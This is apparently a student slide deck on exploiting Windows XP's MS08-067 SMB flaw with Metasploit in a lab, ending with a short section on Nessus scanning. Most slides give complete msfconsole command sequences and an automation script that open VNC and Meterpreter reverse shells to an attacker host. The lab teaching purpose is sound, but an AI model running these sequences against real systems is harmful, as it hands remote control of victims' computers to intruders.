windows xp compromise and remedies
TRANSCRIPT
Compromising windows XP and
RemediesBikrant Gautam, MSIASt. Cloud State University
Overview✘ Terminologies explained✘ Deploying attack✘ Automating attacks✘ Mitigating measures✘ Conclusion
Methodology Overview
● Probe target● Find vulnerabilities● Pass information to
exploit
● Find target● Find Vulnerability● Load Exploit● Load Payload● Setup Listener● Exploit
Scanning
Attacking
Targeting Victims The victim, name: bikrant1 ip: 192.168.1.9
The Attacker, target- vulnerable
Launching the Attack (visual)
Result ===>
Victim OSeverything user does on this computer is visible to the attacker once the exploit is successful
Attacking SystemEverything victim does is seen from Kali Linux using TightVNC console.
Exploit Code:> sudo msfconsole> use exploit/windows/smb/ms08_067_netapi> set target 0> set rhost 192.168.1.9> set lhost 192.168.1.6> set lport 4321> set payload windows/vncinject/reverse_tcp> check> exploit
Attack continued(console)Using MeterPreterExploit Script> sudo msfconsole> use exploit/windows/smb/ms08_067_netapi> set target 0> set rhost 192.168.1.9> set lhost 192.168.1.6> set lport 4321> set payload windows/meterpreter/reverse_tcp> check> exploit
● Different than previous one● Has access to the command line ● Can create/delete or even execute new
scripts or command
Automating the AttackUsing bash script to automate the attacksrequirement: > script needs to be created at specific folder of metasploit framework.> script once written can be invoked with msfconsole command.-----------------------------------------------------------------> go to location: usr/share/metasploit-framework/scripts/meterpreter> create a file meterpreter.rc using nano or touch> include the following script:use exploit/windows/smb/ms08_067_netapiset target 0set rhost 192.168.1.9set lhost 192.168.1.10set lport 4321set payload windows/vncinject/reverse_tcpexploit
Automating the Attack (2)Using python to automate attackcomplex requirement: > need to download correct library to initiate attack.> package is msfrpc from github> execute similar action as from bash scripting
-----------------------------------------------------------------Difference from Bash Script:> Difficult to implement. > Depends on python version. > Code cannot be run in other system without setting up complete environment.
Initializing the attack
Preventing the AttackScanning for Vulnerabilities using Nessus
> scan the device (provide IP to Nessus)> run the scan> drill down on the critical and high vulnerabilities> read the description and adopt the solution suggested
Conclusion● Security is evolving process.● New vulnerabilities are introduced each day● Penetration and scanning helps you see what’s wrong
with your system● Helps you understand what can be done once the
exploit is executed● “Best defense can only be implemented once you
know your weakest point”
Questions?